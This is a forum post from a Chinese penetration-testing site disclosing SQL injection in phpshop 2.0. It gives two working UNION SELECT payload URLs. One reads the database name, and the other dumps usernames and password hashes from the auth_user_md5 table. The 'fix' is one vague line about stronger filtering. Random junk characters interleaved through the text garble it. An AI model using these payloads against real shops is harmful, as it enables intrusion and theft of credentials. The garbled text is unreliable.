中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
& w! ~7 p% f% m8 T
5 ?. |8 D" G; t! H作者 : By onestree* c7 j* l& |3 y, G- O
下载地址 : http://code.google.com/p/phpshop/downloads/list
# V1 V# d( H0 D- Z/ K$ X测试地址: windows 7 / ubuntu
3 i/ L! S+ X3 @5 F
; n  Q; i0 `. J, \& W( z* K& A7 n
5 j1 o! V8 P- }  ESQLi p0c:
3 M' L1 q# u8 c0 A' [0 k , \% e; b/ u# C5 ~/ E* g
==================' C: F. N8 }6 e$ p; o
0 C* i/ p  S& L6 Q: i" E
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
/ Z2 q" s$ V( q; }, J3 p6 ^union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --2 U9 o3 e2 C/ W
2 x' a% w- n  {2 |
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
, R1 ~9 ~" u& a4 b& U  m
4 M! K. q1 y3 p" y  Y7 l修复:" @1 g$ `$ H2 f
加强过滤# h) ?/ M( m3 {. z3 R
  F! e5 i/ U# u
$ q# _; Q2 k" y# l% `- p' k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2